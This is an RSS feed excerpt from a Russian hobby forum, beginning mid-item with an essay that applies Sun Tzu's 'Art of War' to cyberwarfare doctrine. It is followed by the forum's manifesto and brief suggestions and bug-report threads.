						&lt;p&gt;Самым внушительным трактатом о войне в мировой истории стало «Искусство войны» Сунь-цзы. Этот древний китайский трактат, написанный более двух тысяч лет назад таинственным воином и философом Сунь-цзы. Это классическое руководство по стратегии поведения в конфликтах любого уровня — от психологического соперничества до военных действий. Мудрость его изречений пережила миллионы революций, как в технологическом, так и в человеческом масштабе. Характерные для даосизма представления о человеческой природе, сущности возникающих конфликтов и способах разрешения конфликтных ситуаций дают возможность применять силу без грубого насилия и побеждать еще до начала открытого противостояния. С этой точки зрения «Искусство войны» может считаться настольной книгой политиков, политологов и психологов. Будущие кибервоеначальники смогут по-новому открыть её для себя. Например, при ведении оборонительных действий он предостерегает полководцев от мысли о добрых намерениях других, а также советует изначально не рассчитывать лучший исход. Это вполне разумный совет, особенно учитывая тот факт, что любой компьютер мгновенно подвергается угрозе, получив доступ к интернету.&lt;/p&gt;
						&lt;p&gt;Сунь-цзы говорит: «Искусство войны учит нас полагаться не на вероятность того, что враг не наступит, но на нашу готовность противостоять ему; не на возможность того, что враг не будет атаковать, но на уверенность в том, что наше расположение недосягаемо».&lt;/p&gt;
						&lt;p&gt;В теории, кибервойна должна стать неплохим вариантом мировых войн: она сокращает длительность конфликтов и уменьшает количество человеческих жертв, что способствует экономическому восстановлению страны после военных действий, а также послевоенной дипломатии.&lt;/p&gt;
						&lt;p&gt;Однако, сложность может заключаться в написании военной доктрины, включающей все многочисленные аспекты ведения киберпротивостояний, которые являются революционными для военных. По крайней мере, стоит учитывать хотя бы десять из них:&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: white&quot;&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;1) Интернет — искусственная среда, которая может быть сформирована в соответствии со стандартами национальной безопасности.&lt;br /&gt;2) Постоянное совершенствование технологий и хакерских инструментов делает невозможным владение всеми ими.&lt;br /&gt;3) Возможности конфликтующих сторон определяются связностью компонентов системы и пропускной способностью, а не географическим расположением.&lt;br /&gt;4) Пространство ведения кибевойны постоянно бесконтрольно изменяется из-за апдейтов программного обеспечения и изменения конфигураций сетей.&lt;br /&gt;5) В противовес историческому пониманию войны, киберконфликты поощряют нападающих.&lt;br /&gt;6) Кибератаки могут использоваться для пропаганды, в целях шпионажа, а также для нанесения вреда инфраструктуре противника.&lt;br /&gt;7) Сложность надёжного определения источника кибератаки снижает надежность сдерживания и применения ответных мер.&lt;br /&gt;8) «Тихая» природа киберконфликтов означает, что о ведении кибервойны будут знать только её участники.&lt;br /&gt;9) Отсутствие экспертизы и нехватка доказательств может превратить победу, поражение и последствия военных действий в весьма субъективные понятия.&lt;br /&gt;10) В кибератаках нет моральных запретов — они основываются прежде всего на получении и незаконном использовании цифровых данных. Следовательно, тем самым меньше страдают люди.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Мировые полководцы, включая Сунь-цзы, могут помочь современному миру убрать пробелы в вопросах киберобороны, но многие годы уйдут на то, чтобы включить все аспекты ведения киберконфликтов в мировую военную доктрину.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Mon, 16 Oct 2017 16:35:36 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=39#p39</guid>
		</item>
		<item>
			<title>ПостоБлог</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=38#p38</link>
			<description>&lt;p&gt;Этот проект стал нечто иным, чем обычные батальоны ПостоБлога.&amp;#160; Есть различные разделы, которые могут понравиться любому типу юзеров, ну если ты конечно же не уныл.&lt;/p&gt;
						&lt;p&gt;ПостоБлог - это нечто большее чем форум, сайт или то к чему вы можете это отнести. Это маленькое государство на просторах интернета. Это то место где вы равны со всеми, не зависимо от национальности, расы или же пола. Попав сюда, вы становитесь частью нас. Никакая информация сказанная вами, о вашей личной жизни, не уйдёт за пределы юзеров сайта. &lt;br /&gt;Я и другие разработчики этого сайта, хотим создать свою страну и государство, но не в реале конечно же. А в интернете. То место где вы сможете свободно проводить время, общаться, находить ответы на любые вопросы .Перед нами стоит задача не из простых. Но мы просим терпения от вас, всё же без него никуда. Нас не так много, тех команда не очень большая. Но с вашими идеями мы сможем создать то, самое независимое и свободное государство, сообщество, братство. &lt;br /&gt;Что-же тут есть или будет.&lt;br /&gt;1) Полная свобода в передвижении по сайту, доступ ко всем блогам и разделам. Ну разве что в убежище не пустим.&lt;br /&gt;2) Большое количество информации по лайвхакингу.&amp;#160; &amp;#160;&lt;br /&gt;3) Постоянное обновление сайта. &lt;br /&gt;4) Приятная компания, общение.&lt;br /&gt;5) Возможность анонимного общения.&lt;br /&gt;6) Искоренение уныния в интернете, неадекватов, отупляющих сайтов.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Mon, 16 Oct 2017 16:34:12 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=38#p38</guid>
		</item>
		<item>
			<title>Предложения</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=37#p37</link>
			<description>&lt;p&gt;Если у тебя Юзер, появились какие либо предложения по форуму и ты считаешь что эта идея годная, то выкладывай её сюда. Рады выслушать твою идею и воплотить её в реальность.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Mon, 16 Oct 2017 16:31:00 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=37#p37</guid>
		</item>
		<item>
			<title>Баги</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=36#p36</link>
			<description>&lt;p&gt;Что бы вы хотели чтобы мы исправили?&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Mon, 16 Oct 2017 16:30:26 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=36#p36</guid>
		</item>
	</channel>
</rss>
